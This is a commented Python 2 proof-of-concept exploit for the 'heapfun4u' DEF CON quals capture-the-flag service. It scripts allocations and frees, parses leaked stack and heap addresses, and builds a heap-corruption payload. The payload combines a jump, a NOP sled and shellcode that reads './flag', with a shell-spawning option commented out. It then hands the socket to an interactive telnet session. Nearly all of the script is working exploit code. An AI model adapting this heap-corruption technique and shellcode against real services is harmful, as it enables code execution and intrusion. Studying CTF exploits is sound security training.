# Python 2 proof-of-concept exploit script for the "heapfun4u" CTF challenge
# service (DEF CON quals hostname below). It is Python 2 only: the `print`
# statement, backtick repr and str-as-bytes payload do not run under Python 3.
# `phun` is a project-local helper library (Remote, readfile); it is not on the
# page, so its return shapes are assumed below and marked as such.
import phun
import struct

# Hard-coded remote target; a local alternative is left commented out.
# NOTE(review): the host/port are challenge-specific constants, not parameters.
r = phun.Remote('heapfun4u_873c6d81dd688c9057d5b229cf80579e.quals.shallweplayaga.me',3957)
#r=phun.Remote('localhost',1234)

# Menu-driven interaction: the service prints a prompt ending in '|', each
# command letter is answered with a ':' prompt, then a numeric argument.
# The letters are only visible as protocol here — 'A' + size presumably
# allocates, 'F' + index presumably frees; confirm against the service's menu.
r.read('|')
r.sendline('A');r.read(':');r.sendline(str(512))
r.read('|')
r.sendline('F');r.read(':');r.sendline('1')
r.read('|')
r.sendline('A');r.read(':');r.sendline(str(8));r.read('|')
r.sendline('A');r.read(':');r.sendline(str(16));r.read('|')

# 'N' replies with a line whose last space-separated token is parsed as a hex
# value; the variable name suggests it is a leaked stack address (information
# leak the service hands out — this is the disclosure the rest relies on).
r.sendline('N');y=r.read("\n");r.read('|')
stack=int(y.strip().split(' ')[-1],16)

# 'W' reply: the second-to-last line's second token is parsed as another hex
# address (assumed to be a heap/chunk address from the variable usage below).
r.sendline('W');x=r.read(':')
#print x,hex(stack)
addr=int(x.split('\n')[-2].split(' ')[1],16)

# 64-bit two's-complement delta: (-addr) + (stack - 4 + 0x200), wrapped to
# 64 bits. The low two bits are then forced on; their meaning is presumably
# allocator header flag bits — not derivable from this script, confirm.
xaddr = (0x10000000000000000 - (addr)) + (stack-4+0x200)
xaddr &= 0xffffffffffffffff
xaddr |= 1
xaddr |= 2
# Same wrapped delta, relative to a fixed address in the target binary
# (0x602028); what lives there is not recoverable from this page.
xaddr2 = (0x10000000000000000 - (addr)) + (0x602028)
xaddr2 &= 0xffffffffffffffff
#xaddr = 10#0x100 - ((addr - 8)&0xff)

# Payload layout (bytes): 16 x 'A' | xaddr as native 'Q' | 2-byte opcode
# sequence | 14 x 0xcc | xaddr2 as native 'Q' | 30 x 0x90 | machine code.
# NOTE(review): 'Q' uses native byte order/size; '<Q' would make the intended
# little-endian 8-byte layout explicit and host-independent.
payload = 'A'*16 + struct.pack('Q',xaddr) + "\xeb\x1e"+"\xcc"*14 + struct.pack('Q',xaddr2)
# phun.readfile('./flag', arch='x64') is assumed to return a tuple whose
# element [1] is the x64 machine code for reading './flag' — TODO confirm.
payload += "\x90"*30 + phun.readfile('./flag',arch='x64')[1] #phun.shell('x64')
# Zero-pad to 512 bytes, matching the size of the first allocation above.
payload = payload.ljust(512,'\x00')
#raw_input('x')
#print hex(xaddr),`payload`

# Select entry '1' and write the raw payload into it, then issue 'F' on
# index 3, which is the step that triggers the corrupted state.
r.sendline('1');r.read(':')
r.write(payload)
r.read('|')
r.sendline('F');r.read(':');r.sendline('3')
print r.read('|')
r.write('1')

# Hand the already-connected socket to telnetlib for an interactive session.
# NOTE(review): telnetlib is deprecated since Python 3.11 and removed in 3.13;
# this is a late import placed mid-script rather than at the top of the file.
import telnetlib
t = telnetlib.Telnet()
t.sock = r.sock
t.interact()